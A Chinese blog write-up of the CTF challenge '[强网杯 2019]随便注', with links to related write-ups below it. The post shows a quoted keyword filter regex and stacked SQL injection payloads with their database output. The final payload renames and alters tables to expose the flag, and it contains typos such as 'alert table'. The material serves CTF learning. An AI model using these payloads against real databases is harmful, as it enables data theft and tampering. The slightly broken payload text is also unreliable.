[强网杯 2019]随便注

最新推荐文章于 2024-06-08 11:59:32 发布
最新推荐文章于 2024-06-08 11:59:32 发布
阅读量160 收藏
点赞数
分类专栏: web SQL注入 buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Is_Linmouren/article/details/108788704
版权
web 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
buuctf
4 篇文章 0 订阅
订阅专栏
SQL注入
2 篇文章 0 订阅
订阅专栏

[强网杯 2019]随便注

知识点

  • 堆叠注入

尝试了一下单引号闭合;存在堆叠注入;过滤了

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释

<!-- sqlmap是没有灵魂的 -->

于是试了下sqlmap,可以跑出数据库跑不出表;

动手:payload:`1’;show database;show tables;

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

可以看见数据库;和当前数据库的表都出来了.

再用 1’; show columns from words ;和 1’; show columns from 1919810931114514;看一下表里面的字段

//woeds
array(6) {
  [0]=>
  string(2) "id"
  [1]=>
  string(7) "int(10)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
array(6) {
  [0]=>
  string(4) "data"
  [1]=>
  string(11) "varchar(20)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

 0';show columns from `1919810931114514`;

实际测试的时候发现纯数字的表要加上``符号

//1919810931114514
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

看一下大概知道我们现在语句查询的表是woeds,flag一个在1919810931114514这个表里面.

猜测一下查询语句大概是:select * form words where id = $_GET("inject")';

接下来就是要想法办法去查零位一张表里面的东西

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为word

3.将新的word表插入一列,列名为id

4.将flag列改名为data

我们的payload

1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

直接再查个1就可以得到flag

L1nr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
[强网杯2019]随便(初学者看过来)
xiaobu30的博客
11-15 5097
这是一道web方向的sql入的题目,通过借鉴各位大佬的博客,我给大家分享我学到的几种方法。 查询 “1” 的时候,会有回显 使用单引号闭合,尝试 “1' and 1 = 2#” (可以将这个理解为万能密码,#会将后面的语句释掉) , 发现无回显 仅使用单引号入发现会报sql语法错误 第一种: ...
强网杯2019随便!!sqllibs 第11和12关 postsqlmap直接嗦??堆叠入来看看!!!!
最新发布
helloKittywz的博客
06-08 785
看到了数据库我们在看表,还是一样的加参数 -tables。前面都是get型的入,我们现在来看看post的sql入。我在经过简单的尝试过后,也成功的登录了,看看我下面的。sqlamp中加上参数-r “路径”来进行入。的,看能不能来进行登录,这点就需要我们来进行。post的sql入的话,我们在看见了。,这点跟get入不一样。相结合来进行操作,然后把。放到一个记事本中,然后在。post的话我们要跟。
强网杯 2019]随便
qq_53689523的博客
02-17 155
强网杯2019随便;堆叠入,禁select;sql入,sqlmap
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF——[强网杯 2019]随便 1
小白一枚多多关注的博客
03-17 380
这道题是强网杯的题,如果各位之前做过攻防世界有可能就知道强网杯代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本框以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql入并且sqlmap是做不出来的,所以必须得是手工入,那么手工入就需要判断入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
随便强网杯
m0_70819573的博客
02-21 95
2.很明显是sql入的题,首先判断是字符型还是数字型入,1‘发现有报错,确认了是字符型入.3.因为有过滤,所以考虑用堆叠入。4.用handler读取flag。
强网杯2019 随便
BlueDoorZz的博客
07-11 411
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4231
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
buuoj强网杯2019随便
qq_43619533的博客
12-07 1630
buuoj强网杯2019随便 打开环境: 查看源码: 说明sqlmap行不通。 返回页面 依次输入: 1 1' 1' # 1’ order by 2 # 发现可以正常显示,入题,并且爆出了字段数。 输入select return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤掉了这些...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值